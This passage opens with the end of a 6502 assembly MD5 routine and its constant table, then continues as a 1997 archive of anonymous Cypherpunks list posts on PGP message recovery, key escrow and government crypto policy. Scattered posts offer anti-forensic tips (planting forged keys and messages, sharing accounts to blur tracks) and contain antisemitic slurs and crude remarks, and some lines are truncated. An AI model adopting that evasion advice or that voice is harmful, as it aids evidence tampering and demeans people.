 LDA MD5BUFR+2,X
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5BUFR+3,X
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
*Get next element from table and add it to temp variable
NEXT_T LDX MD5TP
 CLC
 LDA MD5T+3,X ;reverse byte order
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5T+2,X
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5T+1,X
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5T,X
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 INX
 INX
 INX
 INX
 STX MD5TP
 RTS
* MD5 Sine Constants
*   The following is the 64-element MD5 table T[1 ... 64] constructed from
*   the sine function. Let T[i] denote the i-th element of the table, which
*   is equal to the integer part of 2^32, or 4294967296, times abs(sin(i)),
*   where i is in radians.
*   Sorry, Colin, no occult messages here. :)
* These need to be re-arranged to LSB-first
* (which is done by the NEXT_T subroutine)
MD5TP HEX 00 ;Pointer to current element in table below
*  /* Round 1 */
 HEX D76AA478 ; /* 1 */
 HEX E8C7B756 ; /* 2 */
 HEX 242070DB ; /* 3 */
 HEX C1BDCEEE ; /* 4 */
 HEX F57C0FAF ; /* 5 */
 HEX 4787C62A ; /* 6 */
 HEX A8304613 ; /* 7 */
 HEX FD469501 ; /* 8 */
 HEX 698098D8 ; /* 9 */
 HEX 8B44F7AF ; /* 10 */
 HEX FFFF5BB1 ; /* 11 */
 HEX 895CD7BE ; /* 12 */
 HEX 6B901122 ; /* 13 */
 HEX FD987193 ; /* 14 */
 HEX A679438E ; /* 15 */
 HEX 49B40821 ; /* 16 */
*  /* Round 2 */
 HEX F61E2562 ; /* 17 */
 HEX C040B340 ; /* 18 */
 HEX 265E5A51 ; /* 19 */
 HEX E9B6C7AA ; /* 20 */
 HEX D62F105D ; /* 21 */
 HEX 02441453 ; /* 22 */
 HEX D8A1E681 ; /* 23 */
 HEX E7D3FBC8 ; /* 24 */
 HEX 21E1CDE6 ; /* 25 */
 HEX C33707D6 ; /* 26 */
 HEX F4D50D87 ; /* 27 */
 HEX 455A14ED ; /* 28 */
 HEX A9E3E905 ; /* 29 */
 HEX FCEFA3F8 ; /* 30 */
 HEX 676F02D9 ; /* 31 */
 HEX 8D2A4C8A ; /* 32 */
*  /* Round 3 */
 HEX FFFA3942 ; /* 33 */
 HEX 8771F681 ; /* 34 */
 HEX 6D9D6122 ; /* 35 */
 HEX FDE5380C ; /* 36 */
 HEX A4BEEA44 ; /* 37 */
 HEX 4BDECFA9 ; /* 38 */
 HEX F6BB4B60 ; /* 39 */
 HEX BEBFBC70 ; /* 40 */
 HEX 289B7EC6 ; /* 41 */
 HEX EAA127FA ; /* 42 */
 HEX D4EF3085 ; /* 43 */
 HEX 04881D05 ; /* 44 */
 HEX D9D4D039 ; /* 45 */
 HEX E6DB99E5 ; /* 46 */
 HEX 1FA27CF8 ; /* 47 */
 HEX C4AC5665 ; /* 48 */
*  /* Round 4 */
 HEX F4292244 ; /* 49 */
 HEX 432AFF97 ; /* 50 */
 HEX AB9423A7 ; /* 51 */
 HEX FC93A039 ; /* 52 */
 HEX 655B59C3 ; /* 53 */
 HEX 8F0CCC92 ; /* 54 */
 HEX FFEFF47D ; /* 55 */
 HEX 85845DD1 ; /* 56 */
 HEX 6FA87E4F ; /* 57 */
 HEX FE2CE6E0 ; /* 58 */
 HEX A3014314 ; /* 59 */
 HEX 4E0811A1 ; /* 60 */
 HEX F7537E82 ; /* 61 */
 HEX BD3AF235 ; /* 62 */
 HEX 2AD7D2BB ; /* 63 */
 HEX EB86D391 ; /* 64 */

@_date: 1997-10-10 11:41:49
@_author: Anonymous 
@_subject: Where is _my_ blowjob? 
A little confused here.  Let's call the older man "Victor" and his
fifteen year old friend "Harold".  Neither of them were murdered,
right?  Let's call the murder victim "Norbert".
"Harold" refused to rat out "Victor" and now the police are charging
"Harold" with the murder of "Norbert".
What is the relationship between "Harold" and "Norbert"?  You say
there is no direct evidence connecting them.  What evidence does
connect them?  Did they at least know each other?
While "Harold" may not be guilty of the murder, if he did kill
"Norbert" then he should probably be treated as a murderer.  While the
police should not harrass gays, such harrassment does not seem to make
a good excuse for murdering an unrelated completely innocent third

@_date: 1997-10-11 01:23:44
@_author: Anonymous 
@_subject: do NOT escrow communications keys 
Euphemism alert: when we are talking about the kind of data recovery
we like, we call it "backup".  When we are talking about the kind we
don't like, we call it "escrow".  Schneier did the same thing:
Bruce Schneier:
You don't actually mean that you should backup storage keys, you mean you
should provide a means for someone other than the user to decrypt that
stored data.  Schneier means the same thing with regard to "data backup".
This could be a good idea, particularly in terms of old keys leaking
out, but it needs more work.  It's not clear that any of the forward
secrecy methods will work for email.  You can't easily do a DH key
exchange via email because of the multiple messages.  Maybe you could
piggyback on ordinary messages, and after a few have been exchanged,
you can get a DH key for the next message, but this is very complicated.
Synchronization isn't guaranteed with email, neither is reliable delivery.
This is also a good idea, but it needs more work, too.  There is a big
education problem here.  People barely understand the implications of
regular digital signatures.  Now you are throwing this new kind in, which
guarantee the message came from another person, but aren't binding.  What
happens when an employee receives a message from a supplier signed with
that kind of signature?  Can he make a decision on that basis, or not?
In paper business correspondence, there is no such distinction.  A signed
letter is transferable.  Go beyond this and business will be scratching its
heads.  It's a solution looking for a problem.
There may be patents on these technologies, too.
This is going to require special archival software and special actions on
the part of users.  You won't be able to do it as a transparent plugin.
The user can't save his mail the regular way (with some email packages),
he has to remember to (also?) save it to the business access archive.
If he forgets, the business owner has lost access.  There will be
extra training costs, and people will have to change their habits.
Besides being more complex to design and implement, it will be harder
to sell to customers.

@_date: 1997-10-11 05:54:04
@_author: Anonymous 
@_subject: do NOT escrow communications keys (Re: What's really in PGP 5.5?) 
Sometimes you can use this trick to get around storage limitations at
your ISP.  Often mail in the spool file doesn't get added up for the
disk quota.  When you hit your limit, just e-mail yourself a bunch of
megabyte messages.  Sysadmins tend not to like this.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-10-11 06:53:50
@_author: Anonymous 
@_subject: CAK as a really bad form of corporate networking 
One should also ask who is managing the company and why.  It is never
a good policy to leave important components of the company in the
hands of particular people for long periods of time.  While people die
relatively infrequently, they do often become frustrated or angry and
leave the company.
For instance, one really has to ask what is going on when a programmer
doesn't check in his or her code for six months.  And one really has
to wonder how useful that code is going to be to anyone.
My policy has been to discard half completed work when people leave.
It's just cheaper to start anew than to clean up and debug
undocumented code which nobody understands.
In general, the case where "important documents" have to be retrieved
from a departed employee's desk or computer are fairly uncommon.  And
the case where it is necessary to intercept a departed employee's
e-mail is pretty much non-existent.
I am looking forward to hearing the precise mechanisms behind PGP,
Inc.'s change in tune.  Were some of those investors shills?  In terms
of governmental expenditures, it would cost nothing to flood PGP with
great investment deals.  It would probably cost less than Clipper
itself.  And all of the former troublemakers can be quietly ridden
down and finally trained to accept the saddle of good stock deals and
contractual obligations.  If that was the mechanism, it's pretty slick
and to be admired by sportsmen everywhere.
It is the sense of Monty Cantsin that a number of readers of the list
are downplaying PGP Inc.'s actions because they hold the character of
certain people involved with the company in high regard.  This is
probably an error.  Character must be judged by actions.  The actions
are clear.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-10-11 11:05:44
@_author: Anonymous 
@_subject: do NOT escrow communications keys 
Take a look at 5493614 : Private signature and proof systems
INVENTORS: Chaum; David, Sherman Oaks, CA 91403
ISSUED: Feb. 20, 1996
FILED: May 3 , 1994
ABSTRACT:   Cryptographic methods and apparatus for forming (102) and
verifying (103) private signatures and proofs (203,204, 207, and 209)
are disclosed. Such a signature convinces the intended recipient that it
is a valid undeniable or designated-confirmer signature. And such a proof
convinces the intended recipient, just as any cryptographic proof. Even
though the signatures and proofs are convincing to the intended recipient,
they are not convincing to others who may obtain them. Unlike previously
known techniques for convincing without transferring the ability to
convince others, those disclosed here do not require interaction--a
signature or proof can simply be sent as a single message. Because
the intended recipient can forge the signatures and proofs, they are
not convincing to others; but since only the intended recipient can
forge them, they are convincing to the intended recipient. Exemplary
embodiments use a cryptographic challenge value that is said to pivot on
a trap-door function, in that the value can be manipulated by those with
the corresponding trap-door information, and is believed impractical to
manipulate without it.

@_date: 1997-10-11 13:20:08
@_author: Anonymous 
@_subject: non-transferable & designated verifier signatures 
Adam Back:
AKA patent number 5373558 : Desinated-confirmer signature systems INVENTORS: Chaum; David, Sherman Oaks, CA 91403
Not clear how much privacy this buys you.  If one party sues the other,
it's some protection.  But if both parties are hauled into court and
accused of some crime, it's going to be clear enough which party sent
the mail.  Yes, technically it could have been forged by the other party,
but people have been convicted on evidence a lot shakier than this.
Sounds complicated.  It will be years before the legal system is able
to handle these subtleties.  Ordinary digital signatures are challenging
Torn ecash?
With torn ecash, Bob withdraws $100 from his account, but in such a way
that Alice has some crucial information needed to unblind it.  If they
can't come to a meeting of the minds, Bob is out the $100 and Alice is
out the time she spent on the project.  This removes much of the incentive
each has to cheat the other, and gives them an incentive to cooperate.

@_date: 1997-10-12 00:45:06
@_author: Anonymous 
@_subject: Information Warfare 
ZOG translated from the Talmud:
  Too late...
  Yep, Corporate America is crying out for GAK and the right to keep
employees interned in Government Work Camps.
  "Before I send you for your drug-test and prostrate exam, I'm going to
need to know your bra/condom size."
  Shit! I thought I was at the Cypherpunks physical meeting.
  I mean, Kent Crispin and Hallam-Baker were there...
  Say, you don't think...

@_date: 1997-10-12 09:36:13
@_author: Anonymous 
@_subject: No Subject 
Some of us use the old-fashioned way:
* ^From.*bwalk.dm.com
   /dev/null
My procmail log has a bunch of /dev/null entries coming from the unedited
Cypherpunks list. Since spam gets tagged and filtered separately, it looks
like they're V*l*s - he's the only one I know of on cpunx-unedited who's
auto-killed by my mail filters without some kind of notification.
I'll look more closely in the future. Not at his posts, but at the log.

@_date: 1997-10-12 21:53:39
@_author: Anonymous 
@_subject: Phone Line Internet 
Inter at ctive WeekOctober 10, 1997
                      Nortel Unveils 1-Megabit Phone Line
                      Ethernet
                      By Peter Lambert                       1:00 PM EDT                       Northern Telecom Inc. announced the Nortel 1-Meg
Modem, a
                      modem designed to extend Ethernet-equipped
personal computer
                      access across standard telephone lines.                       The company plans to deliver plug-in modules for
its DMS phone
                      company central office switches and its Internet
Thruway voice switch
                      bypass device in the first half of 1998. It will
license the 1-Meg
                      Modem technology to modem makers.                       The 1-Meg will deliver 1-megabit-per-second speeds
                      into homes or businesses and
120-kilobit-per-second speeds in the
                      other direction, and like Ethernet-connected local
area network
                      (LAN) interfaces, the modem will always be on,
requiring no dial-up
                      connection.                       The technology will offer compatibility with both
frame relay and
                      Asynchronous Transfer Mode (ATM) backbone
networks.                       Separately, Nortel finalized a deal to gain an
unspecified equity interest
                      in NetSpeed Inc. and rights to integrate
NetSpeed's Digital Subscriber
                      Line technology into its own products. NetSpeed's
                      LoopRunner Digital Subscriber Line Access
Multiplexer is designed to
                      terminate up to 560 users per central office
system rack.                       Nortel can be found at                        NetSpeed can be found at                             Email Peter Lambert

@_date: 1997-10-13 11:43:33
@_author: Anonymous 
@_subject: Auto-archiving cleartext is GAK 
Advocates of the model where software is automatically archived on
receipt, either in cleartext or re-encrypted with a corporate key,
need to be aware that there are problems with it:
No notification to sender about the policy.
Imagine encrypting this mail to your friend sue at microsoft.com: "Hey Sue -
it's been a while.  Is your boss still being such a wiener?  That was a
great imitation you did of the jerk at the party last month.  He still
doesn't know you're shopping your resume around, right?  What a luser."
You might have thought you had a certain level of privacy when you
encrypted it to your friend's personal key, but you didn't.  This is going
to cause embarrassment and misunderstandings.  People should know if their
mail is going to be automatically saved in the clear to a company archive.
The best way to make sure of that is to have the sender be the one to do
it, or not.
No way to prevent third-party access.
With the corporate message recovery feature, the sender has the
option of simply ignoring the recovery key and sending it encrypted just
to the recipient.  Some corporations won't let it through, others will.
Some companies will want mail to be made recoverable by default, while
still allowing an escape clause for personal mail and special purposes
(like for "sensitive" mail which needs protection against subpoena
and discovery).  They can use the "optional" CMR mode.  Again, senders
are always notified as to which mode is being used by a given company,
and senders can be confident that if they don't use the third-party key,
no access will be possible.  With automatic encryption and archival on
receipt, all mail will be archived, and senders have no notice and no
guarantee that stated policies will be followed.
No escape via super-encryption.
Even if the company is mandating a recovery key and filtering out
messages which aren't encrypted to it, the sender still has the option to
super-encrypt with the recipient key alone, before sending the message
encrypted to the corporate recovery key.  This ensures that only the
recipient's personal key can read the message.  With software which
automatically saves the cleartext of the message, once the user reads
the data it is available to the corporation via the snoopware.
Facilitates GAK!
Suppose this solution is adopted, and software is developed which
automatically re-encrypts received email and sends it to a secure archive.
It's robust and works with a wide variety of email packages.  Now the
government could simply mandate this to be used for all mail reading
software.  The secure archive would be a remote archive maintained by
the FBI to protect public safety.  All plaintext would be sent there,
encrypted by the FBI key.  The business software would already support
this.  This is GAKware!  Unlike with a CMR system, the sender would
have no way to prevent access.
Can't handle forgotten passphrases.
People forget passphrases all the time.  With re-encryption on receipt,
there is no way to recover gracefully from this error.  All the incoming
encrypted data is lost until you can notify everyone who has sent mail to
resend it, and get your new key out to all of them.  These may be purchase
orders, sales leads and other important documents which represent lost
business if they can't be recovered.  This is going to invite people to
use poor security practices like writing down passphrases or choosing
ones which are easy to guess.  Worse, it...
Invites key escrow.
In order to prevent this problem, employees may be forced to share
their secret keys with corporate management.  Software will be written
to facilitate this process.  Crypto companies are already doing this.
Nortel Entrust allows key generation by management, where employees
are given the keys and management keeps a copy.  Shades of Clipper!
This also fails the notification requirement.  Don't believe me?  Take a
look at this description of the Nortel Entrust product:
No system is ideal.
Before pushing this re-encryption model as a panacea, think about the
implications.  No system which provides automatic access to business data
is going to be privacy friendly.  Any such system can be perverted into
supporting GAK.  Load it up with all the disclaimers you like, but if
you advocate software which contains key escrow and which automatically
provides cleartext to third parties, you are not advocating software
which protects privacy.  Be prepared to be called an advocate of GAK next
time you push for software which automatically archives cleartext, because
if it can save it for business, it can save it for government.

@_date: 1997-10-13 21:21:03
@_author: Anonymous 
@_subject: James A. Michner [non-crypto] 
I guess that means the end of The True Story of the InterNet...

@_date: 1997-10-13 23:54:14
@_author: Anonymous 
@_subject: America as a Shake Down Extortion State 
You're ignoring the fact that the legislative and the judicial are just two different horns on the same beast.  "Please impale me with the kinder, gentler horn," is what you're saying.
Let's face it.  This "challenge it and get a legal precedent" approach has done absolutely nothing to stop America, formerly one of the freest countries on earth, from slowly devolving into a socialist police state.
That's why I say fuck the lawyers, and fuck the legislators, too.  If a roomful of morons are writing up ludicrous rules and you're gullible enough to listen to them, then who's the real moron?
Ignore them.  Set a precedent in life.  I'm suggesting active civil disobedience by every thinking person in this country.  I'm not saying blow up a federal building or any other such nonsense.  Be responsible for your actions, but act!  And act intelligently...
[ Imastun ]

@_date: 1997-10-15 01:23:21
@_author: Anonymous 
@_subject: Australian Key Escrow Bill Before Parliament for VPNs 
A couple of ISPs in messages under the "Interception" heading have
pooh-poohed the new interception law that is going through government
processes at the moment. FYI, the following PC Week Australia story
shows that it's not something to be sneezed at, if you want to
differentiate yourself by offering remote access or VPN services that
are secured using encryption. As mentioned in the story, Telstra,
OzEmail, Access One, Connect.com.au and Magna Data are only the largest
of growing band of ISPs who are already constructing VPNs for business
It's going to take more than an a packet sniffer to decrypt secure
messages going through your network. If you're preparing a VPN trial
with something like Data Fellows' F-Secure VPN software, which doesn't
allow for key recovery, then you're up the proverbial creek as regards
your obligations under this new law. You'll have to keep an extra key
for the Feds, ASIO, NCA etc, and only use cryptography software that
includes key recovery.
You'll also have to be involved in a lengthy approval process with the
Attorney-General's department and the ACA, which is dangerously
open-ended. The system will be that you have to submit your plans for
new secure network products every year, and the law enforcement agencies
have a set amount of time to protest that they can't access it. This
process will add three months, at minimum IMHO, to the development of
new services.
And yes, INTIAA has been keeping an eye on it, but they've been getting
the wrong information from the Department of Communication. I wouldn't
say they've been lied to, but they've been given the wrong end of the

@_date: 1997-10-15 01:33:13
@_author: Anonymous 
@_subject: Telstra Australia admits it lied about net 
Telstra: We were wrong about Net
         By GEOFF LONG October 14: A Telstra official has admitted that the carrier
overestimated the congestion problems associated with the Internet,
one of the prime reasons given when it wanted to introduce timed local
Speaking at the launch of Telstra's Big Pond Business services, Big
Pond general manager John Rolland said congestion caused by Internet
users connecting for long periods was not as big an issue as they
first thought.
He added that the about-face was in line with similar findings from
North American carriers and switch manufacturers Alcatel and Ericsson.
Mr Rolland said that the main problem areas are where ISPs are
situated, but that these were manageable: "What is clear is that in
the medium term we will have hot spots, especially around ISPs."
However, these could be addressed by working with the ISPs and
managing connectivity better.
The remarks came in response to Telstra promoting permanent modem
connections as part of its Big Pond Business offering.

@_date: 1997-10-15 16:40:12
@_author: Anonymous 
@_subject: Equal rights for receivers 
Remind me again:
Why was it OK when the SENDER could choose to encrypt to an additional
key, but it's a threat to the free world if the RECEIVER is allowed to
request the same thing?

@_date: 1997-10-15 22:11:36
@_author: Anonymous 
@_subject: Telstra Australia admits it lied about net 
Of course any stats put forward by Telstra are probably a complete fabrication. Telstra's arrogance exists due to its century long
tradition of government backed monopoly resulting in a drain on
Australia's resources and misallocation of capital on such a scale
it defies imagination. It is par for the course for Telstra to now be seeking funding from US taxpayers/consumers. (PS. I heard the same figures you quote below being bandied about here about a week or so

@_date: 1997-10-15 22:54:27
@_author: Anonymous 
@_subject: No Subject 
Brief Background: In the last two months Australia (at this time under
a so called conservative Liberal Government) has re-affirmed its
anti-market controlled economy approach to economics with the
establishment of an IT bureaucracy, forcing ISP's to 'join' the TIO
and fund its operations, establishing the framework for a possible
cencorship regime on the internet, proposed legislation for key
escrow wrt VPN's and pursuing its favoured entrail reading approach to
economics by yet again believing it can 'pick winners' in the market
and allocate resources more efficiently than the market can; an
approach any socialist or totalitarian would be proud to support.
There is very little organised effort to oppose these measures. I
expect that people elsewhere will soon be able to look to Australia as
a testing ground for all the worst case scenarios long discussed on
Now the State has announced it's intention to forcefully mandate
authentication on the internet by imposing yet another taxpayer funded
bureaucracy and to hell with the market solutions already provided at
no cost to citizens. Shame on you Australia.
(Are politicians genetically selected on their ability to make
precisely the wrong decision in any given circumstance? Actually wrt
authentication there is no problem to solve. Doing nothing was the
best thing to do. Of course what this is really about is limiting
entry to markets, corruption and fraud on the public.)
Push to tie up loose ends on Internet
                               By GERVASE GREENE,                                Canberra Online commerce may exceed $6 billion by 2001, but it will be of
little use if customers and businesses cannot identify each other on
the Net.
Federal Cabinet yesterday approved steps to create a national system
for online authentication.
The Government will establish a body to oversee all authentication
systems.  The Communications Minister, Senator Richard Alston, said
this would significantly boost electronic commerce.
"With predictions that electronic commerce in Australia will increase
more than four-fold to $6.3 billion by 2001, the Government is well
aware that development of trust and confidence by businesses and
consumers in the reliability and security of online transactions will
be critical to the development of the information economy," he said.
A group of industry and government experts will report by March next
year on possible functions and powers of the watchdog. This will
include determining the technical standards required before an
identification system obtains certification. Several corporations have
marketed safety systems to exploit concern about the safety of online
Sophisticated encryption will also be necessary before certification
is granted.
Civil liberty groups have called for anonymous transactions to be
possible, while law enforcement bodies have sought access to records
and transactions that would amount to an effective exemption from
privacy obligations.

@_date: 1997-10-16 06:12:36
@_author: Anonymous 
@_subject: No Subject 
I thought that was the whole point of the PGP design.  It makes the
presence of third parties clear and visible to all participants.  This
seems to be the fundamental principle.  PGP is designed to allow Alice
and Bob to be informed if third party access is built in.  Key escrow
and re-encryption are inherently less visible forms of message access.

@_date: 1997-10-17 01:39:41
@_author: Anonymous 
@_subject: Security flaws introduced by "other readers" in CMR 
Let's look a little closer at the kinds of access and notice available in
the PGP system compared to alternatives.
As several people have pointed out, no encryption system can provide
protection against what is done with the message after it is decrypted.
The receiver could share it with whoever he wants to, or whoever he is
forced to.
Consider the following scenarios:
 - An encrypted message is sent to someone at his workplace using current
   systems like PGP 2.6.
 - An encrypted message is sent to someone at his workplace, who is using the
   message access features of PGP 5.5.  The corporation key is marked as
   "optional", and the message is not encrypted to that extra key.
 - An encrypted message is sent as before, but this time the message is
   encrypted to the corporate key.
 - An encrypted message is sent to someone at his workplace, who is using
   a different form of corporate access which relies on key escrow
   or automatic acquisition of cleartext.
We agree that none of these systems can provide complete protection
against third party access.  In any of them, the receiver could be forced
to turn over the encrypted message.  But there is still a difference.
In the first two scenarios, the expectation of privacy is the same.
You are encrypting to a personal key at a business address, but you
expect that you would know about it if the data were being provided to
a third party.  There is no widespread installed base of software which
provides secret access after the message is decrypted.
In fact, the second scenario arguably provides slightly more privacy
than the first, which is what we have now.  The reason is that in the
second scenario, the company provides an optional mechanism for business
mail to be recoverable, but also provides an explicit, sender-controlled
escape clause.  The company is granting an explicit expectation of privacy
by allowing the corporate key recipient to be removed.  With usage of
older versions of PGP, there was really no way for the company to even
inform the sender about whether it was going to be reading the mail.
In the third scenario, where you encrypt to the corporate key, there is
no expectation of privacy.  All parties, the sender, the receiver, and
the company, know that the data is being made available to the business.
There is not much privacy here; what you have is business security.  This
mode would be used for business documents and business communications.
In the fourth scenario, which some people are offering as a superior
approach, the expectation of privacy is much less clear.  Unlike in the
current PGP approach, where the design of the corporate access system
is oriented around notifying the sender and receiver, a key escrow or
plaintext recovery system inherently provides no such notice.
This is different from the status quo.  We are talking about a commercial
product which provides automatic corporate access to communications.
Widespread installation and use of this alternate version of PGP
inherently changes the assumptions and expectations that you will have
when you encrypt to someone at work.  Given the company's desire for
message access, this approach implies that you must conservatively assume
that most encryption to a business address will be read.
The PGP system is designed to avoid this.  It provides another method
for corporate access, a visible and explicit method.  It is intended as
an alternative to key escrow and other systems which recovery data after
the recipient gets it.  PGP's third party recipient feature is designed
to prevent the creation of an installed base of escrowed keys and after
the fact third party access software.
Even if the encryption system provides a way for the user to mark his
keys as being escrowed or otherwise providing third party access,
the system is not self-correcting in the way the PGP system is.
It would be much easier for a business owner to pervert a secretive
access system than one like PGP.  The company could install the access
features but not tell its employees that their keys were being escrowed,
or that their mail client was secretly storing a copy of all plaintexts.
This kind of change would be easy to make with the after-the-fact access
systems some people are proposing.  Yes, theoretically this can be done
with any encryption system (as all agree) but the point is to avoid the
widespread distribution of software which invites this kind of abuse.
The PGP system is designed to satisfy business needs without leading us
into this dangerous situation.
A world in which third party encryption by the sender is the normal and
widespread method for corporate access is one with increased privacy and
more visibility of access.  The alternatives which have been proposed are
prone to abuse and provide less visibility.  They lead us towards a world
in which there is no expectation of privacy even for encrypted messages,
by providing an installed base of snooping software.  The PGP approach
is explicitly designed to keep us out of that world, by removing the need
for that kind of software.

@_date: 1997-10-17 23:13:11
@_author: Anonymous 
@_subject: Non-conventional 
Tim May implied that Cpunx should develop non-conventional email.
Crypto has been declared to be munitions.
Nukes are non-conventional weapons.
Should we be developing nuclear email?
Should we 'email-nuke DC?"
Prespiring minds want to know...

@_date: 1997-10-18 10:44:57
@_author: Anonymous 
@_subject: MonkeyWrenching Monitoring 
I share and/or swap my email accounts with others on a regular basis, particularly at times when I can verify
I was somewhere other than where the account was logged
I do the same with non-essential crypto keys, etc.
This sharing, in many legal jurisdictions, turns your
accounts into a 'public street', so to speak, meaning
that any 'tracks' left behind don't necessarily lead to your own doorstep in a legalistic sense.
A word of caution: If you don't have access to *good*
legal services, the above methods may work against you,
if push comes to shove.

@_date: 1997-10-19 10:15:33
@_author: Anonymous 
@_subject: Is PGP still private? 
Wait a minute.  Didn't Adam abandon the reencryption idea and switch to
key escrow?  Or did that one turn out to be a non-starter too?

@_date: 1997-10-19 11:53:57
@_author: Anonymous 
@_subject: More Government Bullshit 
* In July, the Nova Scotia Gaming Control Commission formally
banned the popular charity fundraiser, "cow-patty bingo," in which
a promoter marks a field into squares, takes bets, and then releases
a recently-fed cow to "select" a winning square.  The Commission
believed the game could be rigged by training a cow to use a
particular spot in the field.  The next day, incoming Nova Scotia
Premier Russell MacLellan said the ban could be ignored.  That
same week, the district attorney's office in Santa Clara County announced that a similar fundraiser for the imminent Gilroy, Calif.,
garlic festival, based on the famous Clydesdale horses' two-mile
march through town, could not be held because it violated the state
gambling law.

@_date: 1997-10-19 12:00:49
@_author: Anonymous 
@_subject: The reason terrorists carry fly-swatters 
* The San Jose Mercury News reported in March on some working
models of the Defense Department's tiny flying machines ("micro
air vehicles"), no larger than birds, including one helicopter that
could fit inside a peanut shell, that are suited for tasks such as
locating hostages in occupied buildings, sniffing out poisonous
chemicals, and finding enemy snipers.  Each micro air vehicle
carries cameras, sensors, transmitters, and antennas.

@_date: 1997-10-20 05:42:27
@_author: Anonymous 
@_subject: Revealing individual messages. 
BC's can also plant secret keys on your machine, along with messages
forged using those keys.
  It is a good idea to keep badly forged messages on your machine, as well as badly forged keys. There are many ways to manipulate files and
emails so that discrepancies exist. e.g. - messages with a time-stamp
later than the file date; replies with an earlier time-stamp than the
original message; changing fingerprint on the same key.

@_date: 1997-10-20 09:19:29
@_author: Anonymous 
@_subject: Security flaws introduced by "other readers" in CMR 
"falls in line"
  "obeys"
  "self-restrained"
  "matures" and "conforms"
  "Habeus Automobileus Recovery"
  Such as Hitler, or Freeh, or DeGaulle.
  There is a lot of truth to the "loose shoes, tight pussy, and
a warm place to shit" school of dictatorship.
  As long as your butt is warm, do you really care whether 'they'
are burning Jews or Jesuits to supply you with heat?
  Has PGP scored Joe 'White Shoes' Jackson as their SpokesPerson?

@_date: 1997-10-21 03:24:18
@_author: Anonymous 
@_subject: Save Water... ask me how! 
Did anyone else go there?
What a smell, eh?
Whoooeee. I bet that guy saves a *lot* of water.
Human-Gus Peter

@_date: 1997-10-21 11:05:15
@_author: Anonymous 
@_subject: consensus on pgp? can we consolidate for action? 
Will these constant lies from C2Nut employees never stop?
I've been at C2 for three months, now, and I haven't seen Lucky do any work, yet.

@_date: 1997-10-21 18:36:21
@_author: Anonymous 
@_subject: French GAK 
Wall Street Journal, October 20, 1997:
   French Proposal For Encryption Is Worrying EC    By Jennifer L. Schenker
   A proposed French law ensuring government access to
   corporate electronic communications is setting off alarm
   bells in the business community and on the European
   Commission.
   France, presenting the law as a liberalization of its
   current policy, is the only Western country that bans any
   domestic use of cryptography - technology that encodes data
   for protection against prying eyes. France also places
   strict controls on the export of encryption tools, a
   restriction imposed by certain other countries, including
   the U.S.
   The new rules, submitted to the European Commission on
   Thursday, allow businesses operating in France to encode
   their corporate secrets but require that keys to unlock the
   code be given to a French government-approved entity in
   which the majority of the capital or votes is retained by
   French nationals.
   Microsoft Corp., Netscape Communications Corp. and the
   Business Software Association have raised objections to the
   French proposal. The BSA represents major international
   software publishers and high-tech companies, including
   Novell Inc., Compaq Computer Corp., Apple Computer Inc. and
   Lotus, a unit of International Business Machines Corp. The
   proposal also requires companies selling products with
   embedded encryption software in France to reveal "source
   code" - the rough equivalent of asking Coke to reveal its
   secret formula. Some believe that such a key-recovery
   system would make it easier for competitors to gain access
   to a company's secrets.
   The BSA's European chapter is expected to release a public
   statement this week supporting the European Commission's
   decision earlier this month to reject the key-recovery
   approach to encryption, which is championed by both the
   U.S. and France.
   The commission, which will formally comment on the French
   proposal by month's end, is concerned partly because the
   French ownership requirements may violate internal market
   rules.
   "I do not say this is the best system. It is the least bad
   in trying to find a balance between national-security
   interests, economic interests and the protection of
   personal privacy," said Gen. Jean-Louis Desvegnes, chief of
   France's Central Service for the Security of Information
   Systems, a civilian agency that reports directly to the
   French prime minister's office. He indicated that France
   might be flexible on the ownership requirements.
   -----

@_date: 1997-10-21 22:58:22
@_author: Anonymous 
@_subject: Dark is faster than Light 
Bell Labs Proves Existence of Dark Suckers
     For years it has been believed that electric bulbs emitted light.
However, recent information from Bell Labs has proven otherwise. bulbs don't emit light, they suck dark.  Thus they now call these bulbs
dark suckers.  The dark sucker theory, according to a Bell Labs
spokesperson, proves the existence of dark, that dark has mass heavier
that of light, and that dark is faster than light.
     The basis of the dark sucker theory is that electric bulbs suck
Take for example, the dark suckers in the room where you are.  There is
less dark right next to them than there is elsewhere.  The larger the
sucker, the greater its capacity to suck dark.  Dark suckers in a
lot have a much greater capacity than the ones in this room.  As with
things, dark suckers don't last forever.  Once they are full of dark,
can no longer suck.  This is proven by the black spot on a full dark
sucker.  A candle is a primitive dark sucker.  A new candle has a white
wick.  You will notice that after the first use, the wick turns black,
representing all the dark which has been sucked into it.  If you hold a
pencil next to the wick of an operating candle, the tip will turn black
because it got in the path of the dark flowing into the candle.
     Unfortunately, these primitive dark suckers have a very limited
There are also portable dark suckers.  The bulbs in these can't handle
of the dark by themselves, and must be aided by a dark storage unit. the dark storage unit is full, it must be either emptied or replaced
the portable dark sucker can operate again.
     Dark has mass.  When dark goes into a dark sucker, friction from
mass generates heat.  Thus it is not wise to touch an operating dark
sucker.  Candles present a special problem, as the dark must travel in
solid wick instead of through glass.  This generates a great amount of
heat.  Thus it can be very dangerous to touch an operating candle.  Dark
also heavier than light.  If you swim deeper and deeper, you notice it
slowly darker and darker.  When you reach a depth of approximately fifty
feet, you are in total darkness.  This is because the heavier dark sinks
the bottom of the lake and the lighter light floats to the top.  The
immense power of dark can be utilized to mans advantage.  We can collect
the dark that has settled to the bottom of lakes and push it through
turbines, which generate electricity and help push it to the ocean where
may be safely stored.  Prior to turbines, it was much more difficult to
dark from the rivers and lakes to the ocean.  The Indians recognized
problem, and tried to solve it.  When on a river in a canoe travelling
the same direction as the flow of the dark, they paddled slowly, so as
to stop the flow of dark, but when they traveled against the flow of
they paddled quickly so as to help push the dark along its way.
     Finally, we must prove that dark is faster than light.  If you were
stand in an illuminated room in front of a closed, dark closet, then
open the closet door, you would see the light slowly enter the closet,
since the dark is so fast, you would not be able to see the dark leave
     In conclusion, Bell Labs stated that dark suckers make all our
much easier.  So the next time you look at an electric bulb remember
it is indeed a dark sucker.

@_date: 1997-10-21 23:42:35
@_author: Anonymous 
@_subject: Cypherpunks Related (?) or merely about DC in general? 
Q. How did Sir Alexander Fleming change Spain's
